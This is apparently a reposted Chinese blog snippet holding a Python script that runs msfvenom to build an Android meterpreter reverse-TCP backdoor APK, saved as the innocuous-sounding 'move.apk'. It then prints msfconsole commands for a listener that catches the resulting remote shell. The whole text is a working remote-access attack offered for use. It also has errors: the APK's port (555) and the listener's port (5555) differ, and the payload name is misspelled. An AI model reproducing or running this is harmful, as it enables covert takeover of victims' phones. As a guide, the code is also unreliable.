listening_to_the_android

import subprocess

action_1_locahost_ip =  [line.split() for line in subprocess.getoutput("ifconfig").splitlines() if "inet" and "netmask" and "broadcast" in line ][0][1]
print("显示kali的IP地址 : ",action_1_locahost_ip)
action_2_creat_apk_cmd = "msfvenom -p android/meterpreter/reverse_tcp LHOST="+action_1_locahost_ip+" LPORT=555 R > ~/Downloads/move.apk"
action_2_creat_apk = subprocess.getoutput(action_2_creat_apk_cmd)
print("创建安卓的apk到指定的下载文件夹 ...\n",action_2_creat_apk)
print("""\n msfconsole # 0.启动监听
        \n # 1.加载模块
        \n use exploit/multi/handler 
        \n #2.加载载荷
        \n set payload adroid/meterpreter/reverse_tcp 
        \n # 3.查看参数设置
        \n show options 
        \n # 4.设置到本机ip
        \n set LHOST 192.168.153.5 
        \n # 5.设置到生成的端口号
        \n set LPORT 5555 
        \n # 6.开始监听
        \n exploit """)

猜你喜欢

转载自blog.csdn.net/weixin_43069769/article/details/114470205
今日推荐